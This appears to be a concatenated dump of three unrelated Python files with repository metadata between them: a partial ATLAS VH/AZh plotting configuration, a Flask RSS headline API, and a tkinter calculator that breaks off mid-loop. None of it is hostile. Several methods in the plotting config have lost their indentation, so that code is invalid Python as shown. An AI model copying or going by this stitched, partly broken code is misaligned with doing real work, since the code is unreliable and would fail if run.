                          'WZ': ("WZ", 53, ROOT.kGray + 1, ["ZZ"]),
                          'ZZ': ("ZZ", 52, ROOT.kGray + 1, ["WZ"]),
                          'VZ': ("VZ", 51, ROOT.kGray + 1, []),
                          'diboson': ("Diboson", 51, ROOT.kGray + 1, []),
                          'WW': ("WW", 50, ROOT.kGray + 3, []),
                          'Diboson': ("Diboson", 50, ROOT.kGray + 1, []),
                          #'VH125': ("Vh", 49, ROOT.kRed - 6, []),
                          'multijet': ("Multijet", 39, ROOT.kViolet-9, ["multijetMu", "multijetEl"]),
                          'multijetEl': ("Multijet", 39, ROOT.kViolet-9, ["multijetMu", "multijet"]),
                          'multijetMu': ("Multijet", 39, ROOT.kViolet-9, ["multijetEl", "multijet"])}
        # self.ATLAS_suffix = "Internal"
        # self.ATLAS_suffix = "Simulation"
        self.ATLAS_suffix = "Preliminary"
        # self.ATLAS_suffix = ""

        # for yields
        self.make_slides = False
        self.window = None
        # sample name -> ordering priority in yield tables
        # NOTE(review): "Zcl": 100 is far above its Z-flavour neighbours
        # (20-27) — confirm whether this outlier is intentional.
        self.priorities = {
            "data" : 80,
            "S/sqrt(S+B)" : 73,
            "S/B" : 72,
            "Bkg" : 60,
            "MC" : 75,
            "SignalExpected" : 71,
            "Signal" : 70,
            "VH125" : 57,
            "ZvvH125" : 67,
            "ggZvvH125" : 67,
            "qqZvvH125" : 67,
            "WlvH125" : 68,
            "ZllH125" : 69,
            "ggZllH125" : 69,
            "qqZllH125" : 69,
            "ZvvH150" : 67,
            "ggZvvH150" : 67,
            "qqZvvH150" : 67,
            "WlvH150" : 68,
            "ZllH150" : 69,
            "AZhllbb1200" : 70,
            "AZhvvbb1200" : 70,
            "AZhllbb1000" : 70,
            "AZhvvbb1000" : 70,
            "AZhllbb400" : 70,
            "AZhvvbb400" : 70,
            "AZhllbb300" : 70,
            "AZhvvbb300" : 70,
            "AZhllbb600" : 70,
            "AZhvvbb600" : 70,
            "bbAZhllbb600" : 70,
            "bbAZhvvbb600" : 70,
            "ggZllH150" : 69,
            "qqZllH150" : 69,
            "ttbar" : 45,
            "stops" : 43,
            "stopt" : 42,
            "stopst" : 41,
            "stopWt" : 40,
            "stop" : 40,
            "Zhf" : 27,
            "Zb" : 24,
            "Zbl" : 25,
            "Zbb" : 27,
            "Zbc" : 26,
            "Zc" : 21,
            "Zcl" : 100,
            "Zclbl" : 22,
            "Zcc" : 23,
            "Zl" : 20,
            "Whf" : 37,
            "Wb" : 34,
            "Wbl" : 35,
            "Wbb" : 37,
            "Wbc" : 36,
            "Wcc" : 33,
            "Wc" : 31,
            "Wcl" : 32,
            "Wl" : 30,
            "WZ" : 53,
            "ZZ" : 52,
            "VZ" : 51,
            "WW" : 50,
            "Diboson" : 50,
            "diboson" : 50,
            "multijet" : 45,
            "multijetEl" : 45,
            "multijetMu" : 45,
            "MJ0lep" : 45,
            "MJ1lep" : 45,
            "MJ2lep" : 45,
            "MJ2lepEl" : 45,
            "MJ1lepEl" : 45,
            "MJ1lepMu" : 45,
        }

        # for reduced diag plots only
        self.exclude_str = 'HiggsNorm'
        # group label -> [shifted?, substrings to include, substrings to exclude]
        self.cov_classification = {
            "BTag": [False, ["SysFT_EFF_Eigen", "SysFT_EFF_extrapolation"], []],
            "Top": [False, ["SysWt", "SysTop", "SysTtbar", "SysMVH"], []],
            "ModelBoson": [False, ["SysVV", "SysWM","SysZM","SysWD","SysZD","SysWP","SysZP","SysVj"], []],
            "Norm": [False, ["Norm","Ratio"], []],
            "norm": [False, ["norm"], []],
            "Lepton": [False, ["SysMUON","SysEL","SysEG"], []],
            "Jet": [False, ["SysJET","FATJET"], []],
            "MET": [False, ["SysMET"], []],
            "LUMI": [False, ["LUMI"], []],
            "Shifted": [True, [], ["blablabla"]]
        }
        # special covariance selections: label -> [include substrings, exclude substrings]
        self.cov_special = {
            "noMCStat": [[], ["gamma"]],
            "JES": [["SigX", "norm_", "Jet"], []],
            "BTag": [["SigX", "norm_", "BTag"], []],
            "Mbb": [["SigX", "norm_", "Mbb"], []],
            "Modelling": [["SigX", "norm_", "Norm", "Ratio", "PtBi"], []],
            "SF": [["SigX", "norm_"], []],
            "Norm": [["3JNorm", "norm_", "Norm", "Ratio"], []]
        }
        self.syst_to_study = ["JetEResol", "Mbb_Whf", "V_Whf", "METScale", "TChanP",
                              "ttbarHigh", "BJetReso", "ZblZbb", "BTagB1", "norm_Wbb", "WblWbbRatio"]
        self.suspicious_syst = ["norm_"]

        # for yield ratios only
        # regex on category name -> [replacement, sum-matching-samples?]
        self.category_condenser = {
            # "_HistSyst": ["_Exp", False],
            # "_dist(mva|mjj)": ["_dist", False],
            # "_distMV1cBTag": ["_dist", False],
            "_distmV": ["_dist", False],
            # "_isMVA[01]": ["_isMVA", False],
            # "_B[0-5]_": ["_B9_", False],
            "_B(Max500_BMin0|BMin500)_": ["_Bresolvedmerged_", False],
            # "_TType(ll|mm|tt|xx)": ["_TType", False],
            "_T[012]": ["_Tx", False],
            "_(incJet1_J|incFat1_Fat|J)[1235]": ["_Jx", False],
            # "_Spc[0-9a-z]*top[a-z]*cr": ["_TType", False],
            # "(multijet)(.*_L)([0123])(.*)": [r'MJ\3lep\2\3\4', False],
            "_L[012]": ["_Lx", False],
            "_D(SR|topemucr)": ["_DallRegions", False],
            # "_W(bb|bl|bc|cc)_": ["_Whf_", True],
            # "_Z(bb|bl|bc|cc)_": ["_Zhf_", True]
        }
        logging.basicConfig(format='%(levelname)s in %(module)s: %(message)s', level=self.loggingLvl)
def do_rebinning (self, prop):
# NOTE: JWH - ED board requests
if prop["dist"] == "mVH":
if "mBBcr" in prop["D"] or "topemucr" in prop["D"]:
if prop["L"] == "2" or prop["L"] == "0":
if prop.get("incFat", "-1") == "1" or prop.get("incJet", "-1") == "1":
return False
if "SR" in prop["D"]:
if prop["L"] == "2" or prop["L"] == "0":
if prop.get("incFat", "-1") == "1":
return False
if prop["L"] == "0":
return False
return True
    def is_signal(self, compname):
        """Check whether a component name matches a configured signal name.

        Returns (has_mass, mass): has_mass is True when one of
        self.sig_names occurs in compname, mass is the integer parsed from
        the characters between the signal tag and the next underscore.

        NOTE(review): if no '_' follows the signal tag, ``find('_')``
        returns -1 and the slice is empty, making int('') raise — confirm
        component names always carry a trailing tag.
        """
        # Spyros: Add ggA to list of signal names - has to be first in list otherwise we get problems
        signames = self.sig_names
        has_mass = False
        mass = ""
        # Spyros: if sg in compname matches also mVH so doesn't work for resonance analyses
        # remove mVH from compname
        compname = re.sub('mVH', '', compname)
        for sg in signames:
            if sg in compname:
                has_mass = True
                pos = compname.find(sg) + len(sg)
                mass = int(re.sub("[^0-9]", "", compname[pos:pos + compname[pos:].find('_')]))
                break
        return has_mass, mass
    def blind_data (self, setup):
        """Blind the data points of a plot setup where required.

        Currently only 2-tag ("T2") categories are blinded, in the Higgs
        mass window [110, 140] GeV; a (0, 0) range means blind everything.
        """
        def _do_blinding (title):
            # returns (should_blind, [low_edge, high_edge])
            #return False, []
            return "T2" in title, [110, 140]

        do_blinding, blind_range = _do_blinding(setup.title)

        if do_blinding:
            # blind entire range
            if blind_range[0] == 0 and blind_range[1] == 0:
                blind_range[0] = setup.data.h.GetXaxis().GetXmin()
                blind_range[1] = setup.data.h.GetXaxis().GetXmax()
            setup.data.blind(blind_range[0], blind_range[1])
        #else:
        #    # Add general blinding at 2% S/B
        #    for i in range(1, setup.hsum.GetNbinsX()+1):
        #        if setup.hsum.GetBinContent(i) > 0:
        #            sob = setup.exp_sig.h.GetBinContent(i) / ( setup.hsum.GetBinContent(i) )
        #            if sob > 0.02:
        #                setup.data.blind(setup.hsum.GetBinLowEdge(i), setup.hsum.GetBinLowEdge(i+1))
        #        elif setup.exp_sig.h.GetBinContent(i) > 0:
        #            setup.data.blind(setup.hsum.GetBinLowEdge(i), setup.hsum.GetBinLowEdge(i+1))
    def preprocess_main_content_histogram (self, hist, setupMaker):
        """Hook to transform a histogram before plotting; identity for AZh.

        The commented-out code below implemented a MeV->GeV axis rescaling
        for 1-lepton distributions and is kept for reference.
        """
        return hist
        # def change_MeV_GeV(hist):
        #     if isinstance(hist, ROOT.TH1):
        #         new_hist = hist.Clone()
        #         bins = new_hist.GetXaxis().GetXbins()
        #         for i in range(bins.GetSize()):
        #             bins[i] /= 1000.
        #         new_hist.SetBins(bins.GetSize()-1, bins.GetArray())
        #         for i in range(new_hist.GetNbinsX()+2):
        #             new_hist.SetBinContent(i, hist.GetBinContent(i))
        #             new_hist.SetBinError(i, hist.GetBinError(i))
        #     elif isinstance(hist, ROOT.TGraph):
        #         new_hist = hist
        #         xbins = new_hist.GetX()
        #         for i in range(new_hist.GetN()):
        #             xbins[i] /= 1000.
        #         if isinstance(hist, ROOT.TGraphAsymmErrors):
        #             xbinsup = new_hist.GetEXhigh()
        #             xbinsdo = new_hist.GetEXlow()
        #             for i in range(new_hist.GetN()):
        #                 xbinsup[i] /= 1000.
        #                 xbinsdo[i] /= 1000.
        #     return new_hist
        #
        #     new_hist = hist
        #     props = sm.setup.properties
        #     if props:
        #         # Changes for MeV/GeV
        #         affected_dists = ["MEff", "MEff3", "MET", "mLL", "mTW", "pTB1", "pTB2", "pTJ3", "pTV", "mBB", "mBBJ"]
        #         if props["L"] == "1" and props["dist"] in affected_dists:
        #             new_hist = change_MeV_GeV(hist)
        #
        #     return new_hist
    def make_sum_plots (self, func):
        """Request the summed category plots via the supplied callback.

        `func(name, rt=..., ea=...)` sums every category whose tags contain
        all of `rt` and none of `ea`, saving the result under `name`.
        """
        #add MET for 0 lepton merged+resolved signal region
        #add mBB for 0 mbbcr+SR
        # loop over 1-tag and 2-tag categories
        for tag_i in ["1", "2"] :
            func("Region_BMax500_BMin0_incJet1_J2_T"+tag_i+"_L2_Y2015_distmBB_Dtopemucr",
                 rt=["_L2", "_T"+tag_i, "_distmBB", "_Dtopemucr"], ea=[])
            func("Region_BMax500_BMin0_incJet1_J2_T"+tag_i+"_L2_Y2015_distmBB",
                 rt=["_L2", "_T"+tag_i, "_distmBB"], ea=["_Dtopemucr"])
            func("Region_BMax500_BMin150_incJet1_J2_T"+tag_i+"_L0_Y2015_distmBB",
                 rt=["_L0", "_T"+tag_i, "_distmBB"], ea=[])
            func("Region_BMin150_T"+tag_i+"_L0_Y2015_distMET_DSR",
                 rt=["_L0","_T"+tag_i, "_distMET","_DSR"], ea=["_L2","_DmBBcr","_Dtopemucr"])
            func("Region_BMin0_T"+tag_i+"_L2_Y2015_distpTV_DSR",
                 rt=["_L2","_T"+tag_i, "_distpTV","_DSR"], ea=["_DmBBcr","_Dtopemucr"])
def get_run_info (self):
lumi = {}
if self._year == "4023":
lumi["2011"] = ["4.7", 7]
lumi["2012"] = ["20.3", 8]
if self._year == "2011":
lumi["2011"] = ["4.7", 7]
if self._year == "2012":
lumi["2012"] = ["20.3", 8]
if self._year == "2015":
lumi["2015"] = ["3.2", 13]
return lumi
def get_title_height (self):
return 3.5 if self._year == "4023" else 2
    def draw_category_ids (self, props, l, pos, nf):
        """Draw the category description lines (region, pTV bin, SR/CR) on a plot.

        Args:
            props: category property dict (L, J, T, D, BMin, BMax, ...).
            l: ROOT TLatex used for drawing.
            pos: (x, y) of the first line.
            nf: vertical line spacing step.

        Returns:
            (x, y) position below the last drawn line.
        """
        merged = False
        plural_jets = False
        nf += 0.25*nf # a bit more vertical spacing
        nleps = props.get("L", "-100")
        if nleps == '3':
            # "3" encodes the combined 0+1+2 lepton channel
            nleps = "0+1+2"
        njets = props.get("J", "-1")
        nincjets = props.get("incJet", "-1")
        if njets == "23":
            plural_jets = True
            njets = "2+3"
        elif nincjets == '1':
            plural_jets = True
            # njets += '+'
            njets = '#geq {}'.format(njets)
        elif int(njets) > 1:
            plural_jets = True
        nfatjets = props.get("Fat", "-1")
        nincfatjets = props.get("incFat", "-1")
        if int(nfatjets) > 0 and nincfatjets == '1':
            plural_jets = True
            merged = True
            # nfatjets += '+'
            nfatjets = '#geq {}'.format(nfatjets)
            # nfatjets += ' #leq'
        elif int(nfatjets) > 1:
            plural_jets = True
        ntags = props.get("T", "-100")
        # assemble "N lep., M jets, K tags"
        region = ""
        if not nleps == '-100':
            if len(region) > 0:
                region += ', '
            region += "{} lep.".format(nleps)
        if not njets == '-1' or not nfatjets == '-1':
            if len(region) > 0:
                region += ', '
            region += "{} {}jet{}".format(nfatjets if merged else njets,
                                          "large-R " if merged else "",
                                          "s" if plural_jets else "")
        if not ntags == '-100':
            if len(region) > 0:
                region += ', '
            region += "{} tag{}".format(ntags,
                                        "s" if not int(ntags) == 1 else "")
        # assemble the pTV bin label ("-999" means no bound)
        pTVBin = ""
        pTVmin = props.get("BMin", "-999")
        pTVmax = props.get("BMax", "-999")
        if not pTVmin == "-999" and pTVmax == "-999" and not pTVmin == "0":
            pTVBin = "{0} GeV #leq p_{{T}}^{{V}}".format(pTVmin)
        elif (pTVmin == "0" or pTVmin == "-999") and not pTVmax == "-999":
            pTVBin = "p_{{T}}^{{V}} < {0} GeV".format(pTVmax)
        elif not pTVmin == "-999" and not pTVmax == "-999":
            pTVBin = "{0} GeV #leq p_{{T}}^{{V}} < {1} GeV".format(pTVmin, pTVmax)
        # translate the D tag into a human-readable SR/CR description
        signalControl = props.get("D", "")
        if not signalControl == "":
            def add_strings (base, addition):
                # join with ", " unless base is empty
                if base == "":
                    return addition
                else:
                    return base + ", " + addition
            temp = signalControl
            signalControl = ""
            # pTV/MET distributions get a short label instead of mass ranges
            reduce_SR_CR_mBB = props["dist"] == "pTV" or props["dist"] == "MET"
            if temp.find('SR') == 0:
                if reduce_SR_CR_mBB: signalControl = "m_{b#bar{b}} SR"
                elif merged: signalControl = add_strings(signalControl, "75 GeV #leq m_{b#bar{b}} < 145 GeV")
                else: signalControl = add_strings(signalControl, "110 GeV #leq m_{b#bar{b}} < 140 GeV")
                temp = temp[2:]
            if "highmBBcr" in temp:
                if reduce_SR_CR_mBB: signalControl = "m_{b#bar{b}} upper CR"
                elif merged: signalControl = add_strings(signalControl, "145 GeV #leq m_{b#bar{b}}")
                else: signalControl = add_strings(signalControl, "140 GeV #leq m_{b#bar{b}}")
                temp = temp.replace("highmBBcr", "")
            if "lowmBBcr" in temp:
                if reduce_SR_CR_mBB: signalControl = "m_{b#bar{b}} lower CR"
                elif merged: signalControl = add_strings(signalControl, "m_{b#bar{b}} < 75 GeV")
                else: signalControl = add_strings(signalControl, "m_{b#bar{b}} < 110 GeV")
                temp = temp.replace("lowmBBcr", "")
            if "mBBcr" in temp:
                if reduce_SR_CR_mBB: signalControl = "m_{b#bar{b}} CR"
                elif merged: signalControl = add_strings(signalControl, "m_{b#bar{b}} #leq 75 GeV, 145 GeV < m_{b#bar{b}}")
                else: signalControl = add_strings(signalControl, "m_{b#bar{b}} #leq 110 GeV, 140 GeV < m_{b#bar{b}}")
                temp = temp.replace("mBBcr", "")
            if "topemucr" in temp:
                signalControl = add_strings(signalControl, "e#mu")
                temp = temp.replace("topemucr", "")
            if "topaddbjetcr" in temp:
                signalControl = add_strings(signalControl, "+1 b-jet")
                temp = temp.replace("topaddbjetcr", "")
        # draw the assembled lines, stepping down by nf each time
        pos_next = pos[1] - 0.1*nf # a bit more spacing
        l.DrawLatex(pos[0], pos_next, region)
        if not pTVBin == "":
            pos_next -= nf
            l.DrawLatex(pos[0], pos_next, pTVBin)
        if not signalControl == "":
            pos_next -= nf
            l.DrawLatex(pos[0], pos_next, signalControl)
        pos_next -= nf
        return (pos[0], pos_next)
def force_mu_value (self):
return self.force_mu
def get_year_str (self):
return self._year if int(self._year) < 2015 else ""
def get_xbound_from_properties (self, prop):
return (40, 400) if prop["dist"] == "pTB1" else None
def get_legend_pos_from_properties (self, prop):
result = None
if prop["L"] == '0' and prop["dist"] == "VpT":
result = [0.155, 0.13, 0.375, 0.65]
if prop["dist"] == "dPhiVBB":
result = [0.16, 0.16, 0.38, 0.68]
return result
def get_yscale_factor_from_properties (self, prop, logy):
# if prop["dist"] == "MV1cB1" or prop["dist"] == "MV1cB2" or prop["dist"] == "MV1cBTag":
# if not logy: return 1.5
# if prop["dist"] == "dPhiVBB" :
# if logy: return 5
# else : return 0.7
# if prop["dist"] == "dPhiLBmin" :
# if not logy: return 1.3
# if prop["dist"] == "mjj" :
# if not logy: return 1.1
# if prop["dist"] == "dRBB" :
# if logy: return 500
# if prop["dist"] == "MV1cBTag" :
# if not logy: return 0.75
# if prop["L"] == "0" :
# if prop["dist"] == "MV1cB1" or prop["dist"] == "MV1cB2" or prop["dist"] == "mjj" :
# if not logy: return 1.1
# if prop["dist"] == "MET" :
# if not logy: return 1.0/1.15
return 1.0
    def postprocess_main_content_histogram (self, prop, hist):
        """For MET/pTV spectra, draw a dashed vertical line at the bin edge
        closest to 500 (the merged/resolved transition); returns *hist*."""
        # draw line denoting the transition of merged and resolved
        if prop["dist"] == "MET" or prop["dist"] == "pTV":
            max_value = hist.GetMaximum()
            min_value = 0#hist.GetYaxis().GetXmin()
            # snap the line to the lower edge of the bin containing 500
            x_value = hist.GetXaxis().GetBinLowEdge(hist.GetXaxis().FindBin(500))
            l = ROOT.TLine(x_value, min_value, x_value, max_value)
            l.SetLineStyle(2)
            l.SetLineWidth(4)
            l.SetNDC(False)
            l.DrawLine(x_value, min_value, x_value, max_value)
            logging.debug("drawing line with endpoint coordinates ({},{}) and ({},{})".format(x_value, min_value, x_value, max_value))
        return hist
def get_xTitle (self, prop, data_hist):
""" get title of X-axis from properties """
if not prop:
return ""
varname = prop["dist"]
result = varname
labels = {
# new
"MV1cB1": "MV1c(b_{1}) OP",
"MV1cB2": "MV1c(b_{2}) OP",
"MV1cBTag": "MV1c(b) OP",
"dEtaBB": "#Delta#eta(b_{1},b_{2})",
"dEtaVBB": "#Delta#eta(V,bb)",
"dPhiLBmin": "#Delta#phi(lep,b)_{min}",
"dPhiVBB": "#Delta#phi(V,bb)",
"dRBB": "#DeltaR(b_{1},b_{2})",
#"MEff": "M_{eff} [GeV]",
#"MEff3": "M_{eff3} [GeV]",
"MEff": "H_{T} [GeV]",
"MEff3": "H_{T} [GeV]",
"MET": "E_{T}^{miss} [GeV]",
"mLL": "M_{ll} [GeV]",
"mTW": "m_{T}(W) [GeV]",
"mva": "BDT_{VH}",
"mvaVZ": "BDT_{VZ}",
"pTB1": "p_{T}(b_{1}) [GeV]",
"pTB2": "p_{T}(b_{2}) [GeV]",
"pTJ3": "p_{T}(j_{3}) [GeV]",
"pTV": "p_{T}^{V} [GeV]",
"VpT": "p_{T}^{V} [GeV]",
"mVH": "m_{T}(Vh) [GeV]"
}
if "mjj" in varname:
# nominal
tmp_extra = ""
tmp_extra2 = " [GeV]"
# hack for mjj trafo D
#tmp_extra = "Transformed "
#tmp_extra2 = ""
#
if prop["T"] == "2":
result = tmp_extra+"m_{bb}"+tmp_extra2
elif prop["T"] == "1":
result = tmp_extra+"m_{bj}"+tmp_extra2
else:
result = tmp_extra+"m_{jj}"+tmp_extra2
elif "mBBJ" in varname:
if prop["T"] == "2":
result = "m_{bbj} [GeV]"
elif prop["T"] == "1":
result = "m_{bjj} [GeV]"
else:
result = "m_{jjj} [GeV]"
elif "mBB" in varname:
if prop["T"] == "2":
result = "m_{bb} [GeV]"
elif prop["T"] == "1":
result = "m_{bj} [GeV]"
else:
result = "m_{jj} [GeV]"
elif "mVH" in varname:
if prop["L"] == "1" or prop["L"] == "0":
result = "m_{T}(Vh) [GeV]"
else:
result = "m(Vh) [GeV]"
elif varname in labels:
result = labels[varname]
#for k in labels:
#if k in varname:
#return labels[k]
return result
    def get_yTitle_tag (self, prop, data_hist):
        """Y-axis title suffix such as " / 10 GeV", derived from the plotted
        distribution name and the (first) bin width of *data_hist*."""
        extra_unit = ""
        if prop["dist"] == "MEff" : extra_unit = " GeV"
        if prop["dist"] == "MEff3" : extra_unit = " GeV"
        if prop["dist"] == "MET" : extra_unit = " GeV"
        if prop["dist"] == "mLL" : extra_unit = " GeV"
        if prop["dist"] == "mTW" : extra_unit = " GeV"
        if prop["dist"] == "pTB1" : extra_unit = " GeV"
        if prop["dist"] == "pTB2" : extra_unit = " GeV"
        if prop["dist"] == "pTJ3" : extra_unit = " GeV"
        if prop["dist"] == "pTV" : extra_unit = " GeV"
        #if prop["dist"] == "VpT" : extra_unit = " GeV" # new
        if prop["dist"] == "mjj" : extra_unit = " GeV" # hack -> comment when trafoD
        if prop["dist"] == "mBB" : extra_unit = " GeV"
        if prop["dist"] == "mBBJ" : extra_unit = " GeV"
        if prop["dist"] == "mVH" : extra_unit = " GeV"
        # NOTE: JWH - ED board requests
        if not self.do_rebinning(prop):
            # if not (prop["dist"] == "mVH" and prop.get("incFat", "-1") == "-1" and
            #        prop.get("D", "") == "SR" and prop.get("L", "0") == "2") :
            # prepend the integer part of the bin width, e.g. " 10 GeV"
            extra_number = str(data_hist.GetBinWidth(1))
            if not extra_number.find('.') == -1: extra_number = extra_number[:extra_number.find('.')]
            extra_unit = " " + extra_number + extra_unit
        # bin width rounded to 2 decimals; drop the decimals when integral
        y_ratio = round(data_hist.GetBinWidth(1), 2)
        if (y_ratio*10) % 10 == 0 and (y_ratio*100) % 100 == 0: y_ratio = int(y_ratio)
        if prop["dist"] == "VpT": extra_str = " / bin" # new
        elif prop["dist"] == "mVH": extra_str = " /" + extra_unit
        else: extra_str = " / " + str(y_ratio) + extra_unit # new
        # the MV1c operating-point plots carry no per-bin unit at all
        if prop["dist"] == "MV1cB1": extra_str = ""
        if prop["dist"] == "MV1cB2": extra_str = ""
        if prop["dist"] == "MV1cBTag": extra_str = ""
        return extra_str
    def set_y_range (self, hist, nlegend_items, miny, maxy, log_scale, prop):
        """Set the y-axis range so the histogram content occupies only the
        lower 'content fraction' of the pad, leaving headroom for the legend.
        The many per-figure multipliers below reproduce specific figures of
        the conf note. ("faction" is a long-standing typo for "fraction".)"""
        # if log_scale and prop["dist"] == "mVH":
        #     hist.SetMaximum(maxy * 100)
        #     hist.SetMinimum(0.001)
        #     return
        bottom_padding = 1.0/16.0
        # a crowded legend (>8 entries) squeezes the content further down
        content_faction = 4.0/7.0 if nlegend_items <= 8 else 3.0/7.0
        if prop["dist"] == "mVH":
            # figures 2)a-d in conf note
            if (prop["L"] == "0" or prop["L"] == "2") and log_scale:
                if prop["T"] == "1" or prop["T"] == "2":
                    if prop["D"] == "mBBcr":
                        if prop.get("BMax", "-999") == "500":
                            content_faction *= 1.25
            # figures 3)a,b in conf note
            if prop["D"] == "topemucr" and log_scale:
                if prop["T"] == "1":
                    content_faction *= 1.15
                if prop["T"] == "2":
                    content_faction *= 1.25
            if "SR" in prop["D"]:
                # figures 6)a-d in conf note
                if prop.get("BMax", "-999") == "500" and log_scale:
                    if prop["L"] == "0":
                        if prop["T"] == "1":
                            content_faction *= 1.15
                        if prop["T"] == "2":
                            content_faction *= 1.25
                    if prop["L"] == "2":
                        content_faction *= 1.25
                # figures 7)a,c,d in conf note
                if prop.get("BMin", "-999") == "500" and not log_scale:
                    if prop["L"] == "0":
                        if prop["T"] == "1":
                            content_faction *= 1.5
                    if prop["L"] == "2":
                        if prop["T"] == "1":
                            content_faction *= 2.15
                        if prop["T"] == "2":
                            content_faction *= 1.15
        # figures 4)a-d in conf note
        if prop["dist"] == "mBB" and not log_scale:
            if prop.get("BMax", "-999") == "500" and not (prop.get("D", "") == "topemucr"):
                # if prop["L"] == "0":
                #     if prop["T"] == "1":
                content_faction *= 1.5
            if prop.get("BMax", "-999") == "500" and prop.get("D", "") == "topemucr":
                content_faction *= 1.15
        # figures 10)a-d in conf note
        if (prop["dist"] == "MET" or prop["dist"] == "pTV") and log_scale:
            content_faction *= 1.25
        if not log_scale:
            # linear scale: pad below the minimum, then stretch the top so the
            # content fills only content_faction of the visible range
            if miny < 1e-6: miny = 0
            plot_scale = (maxy - miny)
            bottom = miny - bottom_padding*plot_scale
            top = bottom + plot_scale/content_faction
            # hist.SetMinimum(bottom)
            # hist.SetMaximum(top)
            hist.GetYaxis().SetLimits(bottom, top)
            # hist.GetHistogram().GetYaxis().SetRangeUser(bottom, top)
            logging.debug("setting plot y-range to ({0}, {1})".format(hist.GetHistogram().GetYaxis().GetXmin(), hist.GetHistogram().GetYaxis().GetXmax()))
            return
        else:
            # log scale: do the same headroom computation in log10 space
            log_miny = ROOT.TMath.Log10(miny)
            log_maxy = ROOT.TMath.Log10(maxy)
            plot_scale = (log_maxy - log_miny)
            # 0.25 is just fine tuning
            # bottom = log_miny - 0.25*bottom_padding*plot_scale
            bottom = log_miny
            top = bottom + plot_scale/content_faction
            # hist.SetMinimum(ROOT.TMath.Power(10, bottom))
            # hist.SetMaximum(ROOT.TMath.Power(10, top))
            hist.GetYaxis().SetLimits(ROOT.TMath.Power(10, bottom), ROOT.TMath.Power(10, top))
            # hist.GetHistogram().GetYaxis().SetRangeUser(ROOT.TMath.Power(10, bottom), ROOT.TMath.Power(10, top))
            logging.debug("setting log scale plot y-range to ({0}, {1})".format(hist.GetHistogram().GetYaxis().GetXmin(), hist.GetHistogram().GetYaxis().GetXmax()))
            return
        # if not log_scale and miny > 0:
        #     miny = 0
        # if log_scale and miny <= 1:
        #     miny = 0.25
        # mini = miny
        #
        # if mini < 0:
        #     hist.SetMinimum(mini*1.25)
        # else:
        #     mini = 0
        # # fix 0 cut in the Y axis
        # #hist.SetMinimum(0.01)
        # if log_scale:
        #     hist.SetMaximum(maxy * 100)
        #     hist.SetMinimum(miny / 2.5)
        # else:
        #     hist.SetMaximum(mini + (maxy - mini) * 1.5)
def auto_compute_ratio_yscale_from_properties (self, prop):
return (prop["dist"] == "mva" or prop["dist"] == "mvaVZ")
def scale_all_yvals(self, prop):
return prop["dist"] == "mva", 0.05
def postprocess_dataMC_ratio_histogram (self, prop, hist):
return hist
def determine_year_from_title (self, title):
if "2015" in title:
return "2015"
elif "2012" in title:
return "2012"
elif "2011" in title:
return "2011"
elif "both" in title:
return "4023"
def add_additional_signal_info_to_legend (self, legend, signal):
if signal.mode == self._STACK:
legend.AddEntry(ROOT.NULL, "m_{H}=" + str(signal.mass) + " GeV", "")
else:
legend.AddEntry(ROOT.NULL, "m_{H}=" + str(signal.mass) + " GeV", "")
| btannenw/physics-dihiggs | statCode/scripts/VHbbRun2/analysisPlottingConfig.py | analysisPlottingConfig.py | py | 30,133 | python | en | code | 1 | github-code | 36 |
73412902183 | from flask import Flask, jsonify, redirect
import feedparser
app = Flask(__name__)
# Function grabs the rss feed headlines (titles) and returns them as a list
def getHeadlines( rss_url ):
    """Fetch an RSS feed and return a flat list alternating each item's
    title and link, in feed order."""
    feed = feedparser.parse( rss_url )
    results = []
    for entry in feed['items']:
        results.extend([entry['title'], entry['link']])
    return results
@app.route('/', methods=['GET'])
def home():
    """Landing page: a short HTML blurb describing the API."""
    return ("<h1>Welcome to News Feeder API</h1>\n"
            "    <p>A prototype API for national and international news feed getter.</p>")
@app.route('/resources/documentation', methods=['GET'])
def documentation():
    """Redirect (303 See Other) to the hosted SwaggerHub API documentation."""
    docs_url = 'https://app.swaggerhub.com/apis/daffaadevvv/NewsFeederAPI/1.0.0'
    return redirect(docs_url, code = 303)
@app.route('/resources/news/internasional', methods=['GET'])
def indexinter():
    """Aggregate the international RSS feeds and return all headlines as JSON."""
    # RSS feeds that we will fetch and combine
    feeds = {
        'rtnews': 'https://www.rt.com/rss/',
        'googlenews': 'https://news.google.com/news/rss/?hl=en&ned=us&gl=US'
    }
    combined = []
    for url in feeds.values():
        # getHeadlines() returns alternating title/link entries
        combined.extend(getHeadlines(url))
    print(combined)  # debug trace of the aggregated payload
    return jsonify(combined)
@app.route('/resources/news/dalamnegeri', methods=['GET'])
def indexnat():
    """Aggregate the national (Indonesian) RSS feeds and return all headlines as JSON."""
    # RSS feeds that we will fetch and combine
    feeds = {
        'republikanews': 'https://www.republika.co.id/rss',
        'detiknews': 'http://rss.detik.com/index.php/detikcom'
    }
    combined = []
    for url in feeds.values():
        # getHeadlines() returns alternating title/link entries
        combined.extend(getHeadlines(url))
    print(combined)  # debug trace of the aggregated payload
    return jsonify(combined)
if __name__ == '__main__':
app.run(debug = True) | daffaadevvv/StudyGit | newsfeederapi.py | newsfeederapi.py | py | 2,102 | python | en | code | 0 | github-code | 36 |
42511308205 | #Simple Calculator using tkinter
#by saty035
from tkinter import* #GUI toolkit
#entering numbers
def btnClick(numbers):
    """Append the pressed key (a digit or operator symbol) to the running
    expression and refresh the display."""
    global operator
    operator += str(numbers)
    text_input.set(operator)
#Clearing the screen
def btnClearDisplay():
    """Reset the pending expression and blank the display."""
    global operator
    operator = ''
    text_input.set("")
#resulting output
def btnEql():
    """Evaluate the accumulated expression and show the result.

    Previously a bad expression (e.g. "7/0", "5**", or pressing "=" with an
    empty display) raised inside the Tk callback and broke the app; now any
    evaluation failure just shows "Error".
    """
    global operator
    try:
        # operator only ever contains digits and + - * / entered via the
        # buttons, so eval is acceptable here; it can still raise
        # ZeroDivisionError or SyntaxError.
        result = str(eval(operator))
    except Exception:
        result = "Error"
    text_input.set(result)
    operator = ''
cal=Tk()
cal.title("Calculator by saty035") #title
operator=""
text_input=StringVar()
#screen
txtDisplay=Entry(cal,font=('ariel',20,'bold'), textvariable=text_input,bd=30,insertwidth=4,bg='pink',justify='right').grid(columnspan=4)

# Button factory: every key shares the same look, only label, grid cell,
# callback and vertical padding differ.  NOTE: .grid() returns None, so the
# original btn* variables never held widget references anyway.
def _make_button(label, row, column, command, pady=0):
    Button(cal, padx=16, pady=pady, bd=8, fg='black', font=('ariel', 20, 'bold'),
           text=label, command=command, bg='powder blue').grid(row=row, column=column)

# digits and binary operators, laid out as on the keypad
for _label, _row, _col in [('7', 1, 0), ('8', 1, 1), ('9', 1, 2), ('+', 1, 3),
